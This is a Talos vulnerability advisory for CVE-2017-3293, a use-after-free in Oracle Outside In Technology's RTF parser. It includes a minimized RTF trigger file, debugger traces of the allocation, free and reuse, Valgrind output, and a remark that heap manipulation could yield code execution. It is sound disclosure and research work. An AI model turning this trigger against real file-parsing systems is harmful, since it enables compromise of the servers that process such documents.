Talos Vulnerability Report

TALOS-2016-0215

Oracle Outside In Technology RTF Parsing Code Execution Vulnerability

January 17, 2017

Report ID

CVE-2017-3293

Summary

An exploitable Use After Free vulnerability exists in the RTF parser functionality of Oracle Outside In Technology SDK. A specially crafted RTF document can cause a reuse of a reference to the previously freed memory which can be manipulated into achieving arbitrary code execution.

Tested Versions

Oracle Outside In Technology 8.5.3.

Product URLs

http://www.oracle.com/us/technologies/embedded/025613.htm

CVSSv3 Score

8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:C/A:C)

Details

Oracle Outside In Technology SDK is a widely used file format access and filtering framework. It’s used in many enterprise software distributions for accessing, parsing, filtering and converting numerous file formats.

While parsing a specially crafted RTF document, a reference to a freed object is reused. If during the window of time after the object is freed and before its reference is reused, the same memory area is properly manipulated, it may result in arbitrary reading or writing of memory that could ultimately result in arbitrary code execution.

The minimized testcase that triggers this vulnerability is as follows:

{\rtf1
\ansi
{
\info
\par
}
{
\footer
\posx
{ \par }
}
{
\footer
}
}

In the above example testcase, \par directive causes allocation of memory for an object which is subsequently freed. When document rendering reaches the second \footer directive the same memory area is reused without new allocation. This results in accessing the freed memory. With proper memory manipulation, the attacker can cause the same area of memory to be allocated for a different object. With control of the allocated memory.

The memory allocation and object initialization is done in the function at 0xb6031310 in libde_wp.so shared library (with image base 0xb6022000):

[----------------------------------registers-----------------------------------]
EAX: 0xad496ac0 (0xad496ac0)
EBX: 0xb6073934 --> 0x517f0
ECX: 0xb5f52bac --> 0x10000
EDX: 0x4
ESI: 0xb5f52bac --> 0x10000
EDI: 0xad4c7f38 --> 0x1
EBP: 0xad499f58 --> 0x1
ESP: 0xbfffb1f0 --> 0x0
EIP: 0xb60352b6 (mov    DWORD PTR [esp+0x28],eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
			0xb60352aa:        xor    edx,edx
			0xb60352ac:        mov    eax,0x4
			0xb60352b1:        call   0xb6031310
=> 0xb60352b6:        mov    DWORD PTR [esp+0x28],eax
			0xb60352ba:        mov    edx,DWORD PTR [esp+0x28]
			0xb60352be:        test   edx,edx
			0xb60352c0:        jne    0xb6034e40
			0xb60352c6:        jmp    0xb6034caa
[------------------------------------stack-------------------------------------]
0000| 0xbfffb1f0 --> 0x0
0004| 0xbfffb1f4 --> 0x0
0008| 0xbfffb1f8 --> 0xb603edae (<OIWCloseFatal>:        push   ebx)
0012| 0xbfffb1fc --> 0xb601b4f0 --> 0xb70d9edc --> 0xc002
0016| 0xbfffb200 --> 0xb5f53d8c --> 0x0
0020| 0xbfffb204 --> 0x0
0024| 0xbfffb208 --> 0x0
0028| 0xbfffb20c --> 0xb5f52bac --> 0x10000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value


Breakpoint 16, 0xb60352b6 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ bt
#0  0xb60352b6 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1  0xb603bb0f in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2  0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3  0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4  0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5  0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6  0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7  0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#8  0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#9  0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#10 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#11 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#12 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#13 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#14 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#15 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#16 0x08048b7b in main ()
gdb-peda$

In the above output, we can see that allocated buffer is at 0xad496ac0. The buffer is later freed at 0xb602de67 in the same library by calling SYSNativeFree which is a wrapper around free():

gdb-peda$ awatch *0xad496ac0
Hardware access (read/write) watchpoint 17: *0xad496ac0
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0xb6073934 --> 0x517f0
ECX: 0x7
EDX: 0x0
ESI: 0xad496ac0 (0xad496ac0)
EDI: 0xad496ac0 (0xad496ac0)
EBP: 0x1
ESP: 0xbfffa930 --> 0xb5f53e04 --> 0x0
EIP: 0xb602de5c (mov    DWORD PTR [esp],esi)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
			0xb602de52:        je     0xb602de5a
			0xb602de54:        mov    DWORD PTR [esi+0xc80],edx
			0xb602de5a:        mov    esi,DWORD PTR [edi]
=> 0xb602de5c:        mov    DWORD PTR [esp],esi
			0xb602de5f:        call   0xb6027384 <SYSNativeUnlock@plt>
			0xb602de64:        mov    DWORD PTR [esp],esi
			0xb602de67:        call   0xb6027424 <SYSNativeFree@plt>
			0xb602de6c:        add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xbfffa930 --> 0xb5f53e04 --> 0x0
0004| 0xbfffa934 --> 0x1
0008| 0xbfffa938 --> 0x10001
0012| 0xbfffa93c --> 0xb6073934 --> 0x517f0
0016| 0xbfffa940 --> 0xb6073934 --> 0x517f0
0020| 0xbfffa944 --> 0xb601b9b0 --> 0xb601ba00 --> 0xb601b4f0 --> 0xb70d9edc --> 0xc002
0024| 0xbfffa948 --> 0xb5f38ac0 (0xb5f38ac0)
0028| 0xbfffa94c --> 0xb602e243 (mov    ecx,edi)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Hardware access (read/write) watchpoint 17: *0xad496ac0


Value = 0xad496ac0
0xb602de5c in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ bt
#0  0xb602de5c in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1  0xb602e243 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2  0xb603336f in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3  0xb6035dc0 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4  0xb6036abe in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5  0xb603b31e in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6  0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7  0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#8  0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#9  0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#10 0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#11 0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#12 0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#13 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#14 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#15 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#16 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#17 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#18 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#19 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#20 0x08048b7b in main ()
gdb-peda$

The first Use After Free condition occurs at 0xb6036062. During normal execution, the process will not crash because the memory still contains the same valid data, even though it is freed. If a debugging allocator is used (such as libduma), the freed page will be kept busy, but will be marked unreadable in order to catch this kind of issue. In that case, resuming the execution results in the following crash:

gdb-peda$ c
Continuing.


Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xad496ac0 (0xad496ac0)
EBX: 0xb6073934 --> 0x517f0
ECX: 0x4c ('L')
EDX: 0xbfffb22c --> 0xb6073934 --> 0x517f0
ESI: 0xad385ac0 (0xad385ac0)
EDI: 0x0
EBP: 0xad34dac0 (0xad34dac0)
ESP: 0xbfffafd0 --> 0xbfffb058 --> 0x0
EIP: 0xb6036062 (cmp    DWORD PTR [eax+0x40],0xffffffff)
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
			0xb603604e:        je     0xb60362ec
			0xb6036054:        cmp    WORD PTR [esi+0x9dc],0x0
			0xb603605c:        js     0xb60362ec
=> 0xb6036062:        cmp    DWORD PTR [eax+0x40],0xffffffff
			0xb6036066:        je     0xb60362ec
			0xb603606c:        lea    edx,[esi+0x30]
			0xb603606f:        mov    DWORD PTR [esp+0x4c],edx
			0xb6036073:        add    eax,0x40
[------------------------------------stack-------------------------------------]
0000| 0xbfffafd0 --> 0xbfffb058 --> 0x0
0004| 0xbfffafd4 --> 0x0
0008| 0xbfffafd8 --> 0x1d4
0012| 0xbfffafdc --> 0xb7c685b4 ("LOGetString")
0016| 0xbfffafe0 --> 0x1
0020| 0xbfffafe4 --> 0xb6020fa8 --> 0xb6076d51 --> 0xb6022000 --> 0x464c457f
0024| 0xbfffafe8 --> 0x16
0028| 0xbfffafec --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xb6036062 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ vmmap $eax
Start      End        Perm        Name
0xad46b000 0xad499000 ---p        mapped
gdb-peda$ bt
#0  0xb6036062 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1  0xb6036abe in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2  0xb603b31e in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3  0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4  0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5  0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6  0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7  0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#8  0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#9  0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#10 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#11 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#12 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#13 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#14 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#15 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#16 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#17 0x08048b7b in main ()
gdb-peda$

In the above output, it should be observed that the pointer being dereferenced in the cmp instruction is the same as previously freed, and the process has crashed because the page permissions deny read access.

By further manipulating the document by placing an object of precise size between the point of free and point of reuse, further memory corruption can be achieved potentially resulting in arbitrary code execution.

The vulnerability can be triggered by running the ixsample binary, included in the SDK, with the above mentioned testcase. Although the supplied testcase doesn’t cause a crash, the use after free can be caught with Valgrind for example.

Crash Information

Example output from Valgrind:

$ valgrind  $IX ./5f06aa03c157a4f7522d42320f523e93.rtf asd
==17551== Memcheck, a memory error detector
==17551== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==17551== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info
==17551== Command: /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/ixsample ./5f06aa03c157a4f7522d42320f523e93.rtf asd
==17551==
Creating file: "asd"
==17551== Invalid read of size 4
==17551==    at 0x5912062: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5912ABD: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591731D: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==  Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551==    at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551==    by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 4
==17551==    at 0x5905DB7: WPUCompSccvwPos (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==  Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551==    at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551==    by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 4
==17551==    at 0x5912062: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5912A63: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591731D: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==  Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551==    at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551==    by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 1
==17551==    at 0x59174BE: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x50A3521: VwImageExportWriteFunc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x509C851: VwExportWriteFuncEx (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==  Address 0x5d394b0 is 5,408 bytes inside a block of size 5,440 free'd
==17551==    at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551==    by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
Export successful: 1 output file(s) created.
==17551==
==17551== HEAP SUMMARY:
==17551==     in use at exit: 28 bytes in 2 blocks
==17551==   total heap usage: 19,458 allocs, 19,456 frees, 25,394,878 bytes allocated
==17551==
==17551== LEAK SUMMARY:
==17551==    definitely lost: 0 bytes in 0 blocks
==17551==    indirectly lost: 0 bytes in 0 blocks
==17551==      possibly lost: 0 bytes in 0 blocks
==17551==    still reachable: 28 bytes in 2 blocks
==17551==         suppressed: 0 bytes in 0 blocks
==17551== Rerun with --leak-check=full to see details of leaked memory
==17551==
==17551== For counts of detected and suppressed errors, rerun with: -v
==17551== ERROR SUMMARY: 12 errors from 4 contexts (suppressed: 0 from 0)

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.

Timeline

2016-10-10 - Vendor Disclosure
2017-01-17 - Public Release